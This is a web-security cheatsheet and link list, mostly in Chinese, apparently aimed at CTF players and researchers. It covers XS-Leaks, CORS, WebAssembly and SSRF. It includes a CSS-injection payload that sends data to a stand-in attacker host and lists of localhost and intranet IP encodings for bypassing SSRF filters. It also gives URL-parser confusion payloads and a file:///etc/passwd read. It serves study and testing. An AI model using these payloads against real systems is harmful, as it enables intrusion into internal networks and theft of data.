Cheatsheet, Links, Enjoy it ☕️

• 安全研究者的自我修养
• So you want to be a web security researcher?
• 如何阅读一份源代码？

• WebAssembly Concepts
• Using the WebAssembly JavaScript API
• Introduction to WebAssembly
• 玩轉 WebAssembly && 逆向

• 你真的会使用XMLHttpRequest吗?
• SOP與CORS安全詳解

• Exposing Intranets with reliable Browser-based Port scanning
• 从35c3CTF的filemanager题目中学到的一个小tips
• github-xsleaks
• secret note keeper -- Facebook CTF 2019
• gimme-a-bit-exploring-attacks-in-the-post-xss-world

雖然和XSS一樣是跨域偷信息的技巧，但因為受限於SOP所以不是直接回傳信息，而是利用盲注: 配合爆破觀察瀏覽器的行為(猜中和沒猜中頁面會有何差異)! 至於如何跨域觀察瀏覽器的行為呢? 特定信息是可以跨域傳送的，像是iframe count就不受SOP的限制，樓上35c3的filemanager就是利用onload數量和xss-auditor來跨域爆破出flag的!

• 使用CSS窃取数据：攻击与防守

在頁面中注入css，利用attribute selector，若match則傳送特定query ({background:url("https://attack.host/aa");}) 到自己的server以竊取資訊!

Find server's API which will send request

127.0.0.1 127.0.1 127.1 0.0.0.0 // linux 0.0 0 127.0.0.1.xip.io 0x7f000001 2130706433 017700000001 ⓛⓞⓒⓐⓛⓗⓞⓢⓣ // enclosed alphanumerics [::] // use to port to bypass ip segment limit 127.0.0.1:80 // intranet 10.0.0.0/8 // 10.0.0.0 ~ 10.255.255.255 172.16.0.0/12 // 172.16.0.0 ~ 172.31.255.255 192.168.0.0/16 // 192.168.0.0 ~ 192.168.255.255 127.0.0.0/8 0.0.0.0/8

• Obfuscation: double URL-encoding
• According to RFC3968
  url preceded by a double slash, terminated by the next slash, ? or #, or the end of url.
  check url supports @ (embedded credential) or not, combine following payloads with obfuscation
  • evil-host#@expected-host
  • expected-host#@evil-host:evil-port:expected-port
  • expected-host@evil-host
  • evil-host#expected-host

Match rules:

// php parse_url(): host: the host after the last @ // libcurl host: the host after the first @

Check only first time and ignore the second time
find redirect vulnerability e.g. http://aaa.com/a?req=/b
put into API which is already believed by server e.g. api=http://aaa.com/a?req=evil-host

• dict://<user-auth>@<host>:<port>/
• sftp://
• file://

  file:///etc/passwd // the part of first two slashes after file is <protocol> // the third slash is <root dir> file://domain/etc/passwd

• tftp://
• ldap://
• gopher://
  利用 Gopher 协议拓展攻击面

• Only partial url is controlled?

• requestbin
• CEYE

• Portsigger material
• 了解SSRF，這一篇就足夠了
• SSRF testing resources
• 談一談如何在python開發中拒絕SSRF漏洞
• SSRF 學習紀錄